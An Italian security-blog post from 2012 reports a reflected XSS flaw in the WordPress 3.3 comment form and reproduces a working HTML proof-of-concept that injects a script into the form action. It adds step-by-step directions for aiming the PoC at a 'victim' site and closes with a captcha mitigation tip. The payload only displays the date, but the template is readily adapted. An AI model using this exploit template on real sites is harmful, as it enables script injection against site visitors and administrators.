Capn3m0 WebSecurity Logo
  • WP PLUGINS
    • FaceBook Image Fix v0.4.3
    • wp-users-page
  • Staff
  • Job
  • Contacts
RSS Capn3m0 WebSecurity su Google capn3m0 su Scoop.it capn3m0 on Twitter capn3m0 on Facebook capn3m0 on Google+
  • Home
  • News
  • Sicurezza
  • Mobile
  • Seo&Social
  • Tips&Tricks
  • Video Geek
  • Crack Tools
    • Alice Wpa Calculator OnLine
    • Fastweb Wpa Calculator OnLine
    • MD5 Encrypt / Decrypt

Translator

Ads

Social Connection

Segui @capn3m0
Seguicisu Capn3m0 WebSecurity su Google+
Seguicisu Capn3m0 WebSecurity su Google Currents

Ultime Notizie

  • Novità in casa Pinterest: arrivano i Rich Pin Novità in casa Pinterest: arrivano i Rich Pin 24 maggio 2013 18:19
  • Google lancia una nuova versione di Google Maps Google lancia una nuova versione di Google Maps 24 maggio 2013 13:22
  • MATAERIAL: la stampante 3D che non soffre la gravità MATAERIAL: la stampante 3D che non soffre la gravità 24 maggio 2013 09:06
  • Possibili usi dei Google Glass nella Sanità Possibili usi dei Google Glass nella Sanità 23 maggio 2013 14:36

Meta

  • Registrati
  • Collegati
  • Voce RSS
  • RSS dei commenti
  • WordPress.org

WordPress 3.3, 0-day Reflected XSS Vulnerability

Sicurezza — scritto da capn3m0 il 3 gennaio 2012 09:48

WordPress 3.3, 0 day Reflected XSS VulnerabilityA pochi giorni dal rilascio della nuova versione di WordPress, la 3.3, due hacker indiani hanno individuato una vulnerabilità che permette di eseguire codice XSS sfruttando un problema nel form di pubblicazione dei commenti.

Praticamente per eseguire l’exploit è necessario per prima cosa pubblicare un commento sul WordPress vittima.

Una volta fatto ciò è necessario creare una pagina contente il seguente codice e pubblicarla in un proprio spazio Web.

<html>
<title>Wordpress 3.3 XSS PoC</title>
<body>
<form name="XSS" id="XSS" action="http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="replace me"/>
<input type="hidden" name="email" value="replace me"/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="comment" value="replace me"/>
<input type="hidden" name="submit" value="Post Comment"/>
<input type="hidden" name="comment_post_ID" value="replace me"/>
<input type="hidden" name="comment_parent" value="0"/>
<input type="button" value="Click Me" />
</style></form>
</body>
</html>

Al posto di “replace me” vanno inseriti gli stessi dati usati nel precedente commento e al posto di “http://192.168.1.102/wordpress/” va inserito il riferimento del sito vittima.

A questo punto basterà cliccare sul tasto “Click me” e lo script provvederà nuovamente a pubblicare il post. Trovandolo già pubblicato genererà un errore di cotenuto duplicato ma il codice Javascript inserito nel “form action” della nostra pagina verrà eseguito.

Nell’esempio il codice Javascript da eseguire era il seguente:


<script>document.write(Date())</script>

che serve a visualizzare la data di sistema e, come si vede dalla seguente immagine,viene correttamenete eseguito dimostrando la vulnerabilità XSS.

WordPress 3.3, 0 day Reflected XSS Vulnerability

In attesa di sviluppi e di una patch credo sia utile attivare temporaneamente un captcha o similare per i commenti così da evitare o almeno diminuire la possibilità di venire attaccati.

Link di riferimento

Zero Day Reflected Cross Site Scripting vulnerability in WordPress 3.3 – The Hackers News
Sorgenti Pastebin.com

 

Articoli che potrebbero interessarti:

Wordpress pingback: falla permette attacchi D...
[UPGRADE] WordPress 3.3: Sonny suona per noi
[EXPLOIT] - Joomla all versions XSS vulnerabi...
Rilasciato WordPress 2.8.6 per correggere 2 f...

  • Pingback: Alex745

capn3m0

capn3m0

Site Facebook Google+Segui @capn3m0
(administrator)
Sono un geek /nerd classe '83, innamorato dell'informatica dall'età di 7. Appassionato del Web, dei linguaggi di programmazione e di sicurezza informatica. Nel 2007 ho creato questo sito per raccogliere tutto ciò che apprendo giorno dopo giorno nelle mie esperienze con il mondo informatico.
293 9

Pingback/Trackback

    05 January 2012 at 8:01am
    ... [Trackback] [...] Read More: ...
  • Alex745
Tags: cross site scripting, vulnerabilità wordpress, wordpress 0-day, wordpress 3.3, wordpress exploit, wordpress vulnerability, wordpress zero-day, xss Search tags: reflected cross site scripting in wordpress 3 3 vulnerabilities,

Subscribe to RSS Iscriviti al Feed RSS

Oppure lascia la tua email per essere sempre aggiornato con le ultime notizie.

© Copyright 2008-2013 — Capn3m0 WebSecurity. All Rights Reserved.
Il Bloggatore Paperblog : le migliori informazioni in diretta dai blog Segnala a Zazoom - Blog Directory
Tweet